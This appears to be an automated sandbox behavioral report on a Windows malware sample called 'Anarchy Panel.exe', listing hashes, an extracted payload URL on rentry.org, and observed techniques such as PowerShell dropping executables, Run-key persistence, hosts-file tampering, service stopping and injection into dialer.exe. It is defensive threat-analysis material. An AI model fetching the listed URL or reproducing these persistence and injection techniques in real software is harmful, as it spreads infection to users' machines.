Analysis
-
max time kernel
137s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
20-06-2023 00:02
Behavioral task
behavioral1
Sample
Anarchy Panel.exe
Resource
win10v2004-20230220-en
General
-
Target
Anarchy Panel.exe
-
Size
71KB
-
MD5
921b80699829ba456a35ff4a4cc16861
-
SHA1
f01420e7dd677d50763c8344d33549076734682a
-
SHA256
a94809a32eb1cee1f9490410fe9592790fe00802c620b1b881fb0c8815b1efba
-
SHA512
a8d2650a9f7290ddaff5c0b1a842cfd4f473f91f23fc8d7f07294c528eb98cca63a48a5f5552c4bf33465f59b9f74fbc3c9d783064e927e8974ca316893c2bf1
-
SSDEEP
384:A67eCgMkHDsar3lL9O65uJor+1kKQmQhVXZzyM9MpPYAhk5:AFla6/wmhrV2pL
Malware Config
Extracted
https://rentry.org/nipkv/raw
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
Processes:
d1vnly0k.tkm1.exeupdaters.exedescription pid process target process PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 1496 created 3136 1496 d1vnly0k.tkm1.exe Explorer.EXE PID 2792 created 3136 2792 updaters.exe Explorer.EXE PID 2792 created 3136 2792 updaters.exe Explorer.EXE PID 2792 created 3136 2792 updaters.exe Explorer.EXE PID 2792 created 3136 2792 updaters.exe Explorer.EXE PID 2792 created 3136 2792 updaters.exe Explorer.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 19 1452 powershell.exe 21 1452 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
d1vnly0k.tkm1.exeupdaters.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts d1vnly0k.tkm1.exe File created C:\Windows\System32\drivers\etc\hosts updaters.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Anarchy Panel.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation Anarchy Panel.exe -
Executes dropped EXE 4 IoCs
Processes:
d1vnly0k.tkm0.exed1vnly0k.tkm1.exed1vnly0k.tkm2.exeupdaters.exepid process 4956 d1vnly0k.tkm0.exe 1496 d1vnly0k.tkm1.exe 848 d1vnly0k.tkm2.exe 2792 updaters.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
d1vnly0k.tkm2.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows\CurrentVersion\Run d1vnly0k.tkm2.exe Set value (str) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " d1vnly0k.tkm2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 10 IoCs
Processes:
svchost.exesvchost.exesvchost.exepowershell.exeOfficeClickToRun.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCPS svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
d1vnly0k.tkm1.exeupdaters.exedescription pid process target process PID 1496 set thread context of 1700 1496 d1vnly0k.tkm1.exe dialer.exe PID 2792 set thread context of 1472 2792 updaters.exe dialer.exe -
Drops file in Program Files directory 1 IoCs
Processes:
d1vnly0k.tkm1.exedescription ioc process File created C:\Program Files\Google\Chrome\updaters.exe d1vnly0k.tkm1.exe -
Launches sc.exe 20 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1076 sc.exe 1424 sc.exe 2732 sc.exe 2064 sc.exe 4596 sc.exe 4452 sc.exe 4044 sc.exe 3604 sc.exe 1580 sc.exe 1448 sc.exe 3308 sc.exe 3432 sc.exe 2796 sc.exe 1344 sc.exe 2284 sc.exe 2164 sc.exe 4632 sc.exe 3564 sc.exe 4980 sc.exe 2964 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2304 3632 WerFault.exe DllHost.exe 4248 3492 WerFault.exe DllHost.exe 1784 4676 WerFault.exe 4476 1120 WerFault.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exeOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 20 Jun 2023 00:03:31 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe -
Modifies registry class 8 IoCs
Processes:
Explorer.EXEsihost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings Explorer.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exed1vnly0k.tkm1.exepowershell.exedialer.exepowershell.exesvchost.exepid process 1452 powershell.exe 1452 powershell.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 3096 powershell.exe 3096 powershell.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1700 dialer.exe 1700 dialer.exe 2308 powershell.exe 2308 powershell.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 3716 svchost.exe 3716 svchost.exe 1700 dialer.exe 1700 dialer.exe 3716 svchost.exe 3716 svchost.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1496 d1vnly0k.tkm1.exe 1496 d1vnly0k.tkm1.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe 1700 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowercfg.exedialer.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 3096 powershell.exe Token: SeShutdownPrivilege 2160 powercfg.exe Token: SeCreatePagefilePrivilege 2160 powercfg.exe Token: SeDebugPrivilege 1700 dialer.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeShutdownPrivilege 1932 powercfg.exe Token: SeCreatePagefilePrivilege 1932 powercfg.exe Token: SeShutdownPrivilege 3628 powercfg.exe Token: SeCreatePagefilePrivilege 3628 powercfg.exe Token: SeShutdownPrivilege 4216 powercfg.exe Token: SeCreatePagefilePrivilege 4216 powercfg.exe Token: SeIncreaseQuotaPrivilege 2308 powershell.exe Token: SeSecurityPrivilege 2308 powershell.exe Token: SeTakeOwnershipPrivilege 2308 powershell.exe Token: SeLoadDriverPrivilege 2308 powershell.exe Token: SeSystemProfilePrivilege 2308 powershell.exe Token: SeSystemtimePrivilege 2308 powershell.exe Token: SeProfSingleProcessPrivilege 2308 powershell.exe Token: SeIncBasePriorityPrivilege 2308 powershell.exe Token: SeCreatePagefilePrivilege 2308 powershell.exe Token: SeBackupPrivilege 2308 powershell.exe Token: SeRestorePrivilege 2308 powershell.exe Token: SeShutdownPrivilege 2308 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeSystemEnvironmentPrivilege 2308 powershell.exe Token: SeRemoteShutdownPrivilege 2308 powershell.exe Token: SeUndockPrivilege 2308 powershell.exe Token: SeManageVolumePrivilege 2308 powershell.exe Token: 33 2308 powershell.exe Token: 34 2308 powershell.exe Token: 35 2308 powershell.exe Token: 36 2308 powershell.exe Token: SeIncreaseQuotaPrivilege 2308 powershell.exe Token: SeSecurityPrivilege 2308 powershell.exe Token: SeTakeOwnershipPrivilege 2308 powershell.exe Token: SeLoadDriverPrivilege 2308 powershell.exe Token: SeSystemProfilePrivilege 2308 powershell.exe Token: SeSystemtimePrivilege 2308 powershell.exe Token: SeProfSingleProcessPrivilege 2308 powershell.exe Token: SeIncBasePriorityPrivilege 2308 powershell.exe Token: SeCreatePagefilePrivilege 2308 powershell.exe Token: SeBackupPrivilege 2308 powershell.exe Token: SeRestorePrivilege 2308 powershell.exe Token: SeShutdownPrivilege 2308 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeSystemEnvironmentPrivilege 2308 powershell.exe Token: SeRemoteShutdownPrivilege 2308 powershell.exe Token: SeUndockPrivilege 2308 powershell.exe Token: SeManageVolumePrivilege 2308 powershell.exe Token: 33 2308 powershell.exe Token: 34 2308 powershell.exe Token: 35 2308 powershell.exe Token: 36 2308 powershell.exe Token: SeIncreaseQuotaPrivilege 2308 powershell.exe Token: SeSecurityPrivilege 2308 powershell.exe Token: SeTakeOwnershipPrivilege 2308 powershell.exe Token: SeLoadDriverPrivilege 2308 powershell.exe Token: SeSystemProfilePrivilege 2308 powershell.exe Token: SeSystemtimePrivilege 2308 powershell.exe Token: SeProfSingleProcessPrivilege 2308 powershell.exe Token: SeIncBasePriorityPrivilege 2308 powershell.exe Token: SeCreatePagefilePrivilege 2308 powershell.exe Token: SeBackupPrivilege 2308 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE 3136 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3136 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Anarchy Panel.exepowershell.execmd.exed1vnly0k.tkm1.execmd.exedialer.exelsass.exedescription pid process target process PID 3108 wrote to memory of 1452 3108 Anarchy Panel.exe powershell.exe PID 3108 wrote to memory of 1452 3108 Anarchy Panel.exe powershell.exe PID 3108 wrote to memory of 1452 3108 Anarchy Panel.exe powershell.exe PID 1452 wrote to memory of 4956 1452 powershell.exe d1vnly0k.tkm0.exe PID 1452 wrote to memory of 4956 1452 powershell.exe d1vnly0k.tkm0.exe PID 1452 wrote to memory of 1496 1452 powershell.exe d1vnly0k.tkm1.exe PID 1452 wrote to memory of 1496 1452 powershell.exe d1vnly0k.tkm1.exe PID 1452 wrote to memory of 848 1452 powershell.exe d1vnly0k.tkm2.exe PID 1452 wrote to memory of 848 1452 powershell.exe d1vnly0k.tkm2.exe PID 1844 wrote to memory of 4452 1844 cmd.exe sc.exe PID 1844 wrote to memory of 4452 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1076 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1076 1844 cmd.exe sc.exe PID 1844 wrote to memory of 2164 1844 cmd.exe sc.exe PID 1844 wrote to memory of 2164 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1424 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1424 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1448 1844 cmd.exe sc.exe PID 1844 wrote to memory of 1448 1844 cmd.exe sc.exe PID 1496 wrote to memory of 1700 1496 d1vnly0k.tkm1.exe dialer.exe PID 3344 wrote to memory of 2160 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 2160 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 1932 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 1932 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 3628 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 3628 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 4216 3344 cmd.exe powercfg.exe PID 3344 wrote to memory of 4216 3344 cmd.exe powercfg.exe PID 1700 wrote to memory of 624 1700 dialer.exe winlogon.exe PID 1700 wrote to memory of 684 1700 dialer.exe lsass.exe PID 1700 wrote to memory of 964 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 380 1700 dialer.exe dwm.exe PID 1700 wrote to memory of 408 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 672 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1036 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1052 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1128 1700 dialer.exe svchost.exe PID 684 wrote to memory of 2600 684 lsass.exe sysmon.exe PID 1700 wrote to memory of 1208 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1228 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1324 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1360 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1408 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1428 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1440 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1556 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1588 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1660 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1676 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1772 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1808 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1852 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1868 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1968 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 1976 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2044 1700 dialer.exe spoolsv.exe PID 1700 wrote to memory of 2076 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2136 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2316 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2324 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2424 1700 dialer.exe sihost.exe PID 1700 wrote to memory of 2452 1700 dialer.exe svchost.exe PID 1700 wrote to memory of 2496 1700 dialer.exe OfficeClickToRun.exe PID 1700 wrote to memory of 2512 1700 dialer.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:684
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:624
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1128 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2580
-
C:\Program Files\Google\Chrome\updaters.exe"C:\Program Files\Google\Chrome\updaters.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2792 -
C:\Program Files\Google\Chrome\updaters.exe"C:\Program Files\Google\Chrome\updaters.exe"2⤵PID:4500
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2136
-
